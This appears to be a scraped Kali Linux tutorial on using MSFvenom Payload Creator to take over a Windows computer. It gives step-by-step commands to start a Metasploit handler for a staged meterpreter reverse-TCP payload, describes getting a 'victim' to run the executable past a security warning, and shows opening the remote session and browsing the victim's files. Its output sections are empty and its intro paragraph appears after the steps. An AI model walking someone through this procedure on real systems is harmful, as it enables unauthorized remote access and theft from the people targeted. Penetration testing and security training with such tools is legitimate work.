How to use the Payload to Hack the Windows Machine In Linux
Step 1 : Copy & Run the Command to Start the Handler
First , Copy the Following Command and paste into the Terminal and hit enter to Start the TCP Handler.
Command :
msfconsole -q -r /home/kali/mpc/windows-meterpreter-staged-reverse-tcp-443-exe.rc
Output :
Step 2 : Send the Payload to the Victim’s Computer
Send the Payload that we’ve Created and Double Click on it. After, that we get to see the Prompt of Security warning we have to Click on the ” RUN ” Button in order to Exploit.
Step 3 : Run the Exploit
We need to enter the first Command on our linux machine to Start the Payload. After the session is Started you need to Interact with the Session with the Help of the Second Command.
Command :
run -j
sessions -i 1
Output :
We have Successfully get the Session of the Victims Computer, Now you can do whatever you can just using the Simple Commands.
Step 4 : Checking the Directory of the Victim’s Computer
To check the Directory of the Victims we just simply need to use the Following Command in order to see the Data from the Directory.
Command :
dir
Output :
MSFvenom Payload Creator (MSFPC) – Installation And Usage in kali linux
Creating effective payloads is key for penetration testing and security research. MSFvenom provides a very flexible payload generation system that can be used to avoid detection. This guide will teach beginners how to install and use the MSFvenom Payload Creator (MSFPC) in Kali Linux. You’ll learn how to easily generate customized payload executables for multiple platforms. MSFPC streamlines the process of utilizing MSFvenom payloads during the red team, cybersecurity testing, and social engineering assessments. By following some simple steps, you can start crafting your payloads with MSFPC in Kali Linux for ethical hacking endeavors.
Contact Us